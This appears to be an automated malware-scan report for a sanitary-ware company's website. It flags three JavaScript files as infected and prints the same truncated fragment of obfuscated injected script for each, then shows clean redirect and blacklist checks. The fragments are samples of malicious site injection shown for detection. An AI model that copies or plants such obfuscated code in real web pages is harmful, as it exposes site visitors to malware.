Scanned pages/files
Request | Server response | Status |
http://ezzisanitary.com/ | 200 OK Content-Length: 13721 Content-Type: text/html | clean |
http://ezzisanitary.com/scripts.js | 200 OK Content-Length: 11400 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var Antivirus reports:
| ||
http://ezzisanitary.com/jquery-latest.pack.js | 200 OK Content-Length: 22430 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var Antivirus reports:
| ||
http://ezzisanitary.com/thickbox-compressed.js | 200 OK Content-Length: 15304 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var Antivirus reports:
| ||
http://ezzisanitary.com/inquiry.htm | 200 OK Content-Length: 1090 Content-Type: text/html | clean |
http://ezzisanitary.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ezzisanitary.com/cp-fittings.htm?keepThis=true&TB_iframe=true&height=450&width=484 | 200 OK Content-Length: 2243 Content-Type: text/html | clean |
http://ezzisanitary.com/products.htm | 200 OK Content-Length: 12008 Content-Type: text/html | clean |
http://ezzisanitary.com/ceramics.htm?keepThis=true&TB_iframe=true&height=450&width=484 | 200 OK Content-Length: 2220 Content-Type: text/html | clean |
http://ezzisanitary.com/bathroom-accessories.htm?keepThis=true&TB_iframe=true&height=450&width=484 | 200 OK Content-Length: 2304 Content-Type: text/html | clean |
http://ezzisanitary.com/index.htm | 200 OK Content-Length: 13721 Content-Type: text/html | clean |
http://ezzisanitary.com/about-us.htm | 200 OK Content-Length: 11952 Content-Type: text/html | clean |
http://ezzisanitary.com/contact-us.htm | 200 OK Content-Length: 12184 Content-Type: text/html | clean |
http://ezzisanitary.com/map.htm | 200 OK Content-Length: 632 Content-Type: text/html | clean |
http://ezzisanitary.com/link-partners.htm | 200 OK Content-Length: 3763 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ezzisanitary.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 16:43:34 GMT
Accept-Ranges: bytes
ETag: "ccc8011-3599-487839def16c0"
Server: Apache
Content-Length: 13721
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 18:41:07 GMT
...13721 bytes of data.
GET / HTTP/1.1
Host: ezzisanitary.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 16:43:34 GMT
Accept-Ranges: bytes
ETag: "ccc8011-3599-487839def16c0"
Server: Apache
Content-Length: 13721
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 18:41:07 GMT
...13721 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ezzisanitary.com
Referer: http://www.google.com/search?q=ezzisanitary.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ezzisanitary.com
Referer: http://www.google.com/search?q=ezzisanitary.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ezzisanitary.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ezzisanitary.com/
Result: ezzisanitary.com is not infected or malware details are not published yet.
Result: ezzisanitary.com is not infected or malware details are not published yet.